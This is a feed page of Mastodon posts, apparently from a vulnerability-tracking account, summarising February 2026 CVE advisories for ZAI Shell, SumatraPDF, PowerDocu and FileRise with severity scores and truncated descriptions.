ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure complex environments. Prior to 9.0.3, the P2P terminal sharing feature (share start) opens a TCP socket on port 5757 without any authentication mechanism. Any remote ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25880
(0 None)

EPSS: 0.01%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T22:18:25.000Z ##

🟠 CVE-2026-25880 - High (7.8)

SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, the PDF reader allows execution of a malicious binary (explorer.exe) located in the same directory as the opened PDF when the user clicks File → “Show in folder”. This be...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25925
(0 None)

EPSS: 0.05%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T22:16:52.000Z ##

🟠 CVE-2026-25925 - High (7.8)

PowerDocu contains a Windows GUI executable to perform technical documentations. Prior to 2.4.0, PowerDocu contains a critical security vulnerability in how it parses JSON files within Flow or App packages. The application blindly trusts the $type...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25231
(0 None)

EPSS: 0.06%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T20:24:01.000Z ##

🟠 CVE-2026-25231 - High (7.5)

FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T20:23:41.000Z ##

🟠 CVE-2026-25231 - High (7.5)

FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

Visit counter For Websites